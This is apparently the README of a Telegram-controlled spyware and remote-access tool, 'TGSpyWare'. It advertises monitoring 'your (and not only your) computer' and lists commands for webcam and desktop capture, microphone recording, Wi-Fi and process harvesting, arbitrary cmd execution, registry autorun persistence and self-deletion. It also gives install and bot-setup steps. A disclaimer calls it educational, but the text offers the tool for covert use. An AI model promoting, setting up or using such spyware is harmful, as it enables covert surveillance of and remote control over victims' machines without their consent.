This software allows you to monitor the operation of your (and not only your) computer and remotely control it using telegram as a C2 server.
Attention! The author of this software is not responsible for any consequences from its use. All materials are provided exclusively for educational purposes!
Use the git to install SpyWare.
git clone https://github.com/OverPotter/TGSpyWare.git
- /check - Checking System Status
- /pc_info - System characteristics
- /con_info - Connection characteristics
- /proc_info - List of running processes
- /wifi_info - Information about Wi-Fi connections
- /pub_ip_info - Information about public IP address
- /screen - Desktop screenshot
- /webcam_screen - Webcam screen
- /audio n - (n - count of seconds)Record sound from voice recorder for 5 seconds by default
- /exec c - (c - command) Execute command in cmd
- /reg_autorun - Append programme to registry
- /del_autorun - Delete programme from registry
- /exit - Shutting down the program before reboot
- /destroy - Delete the program from the computer
To launch, you need to create a bot via @BotFather, get our ID in telegram via @IDBot or @userinfobot
after fill in tg_config.py
and launch main.py
.
Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.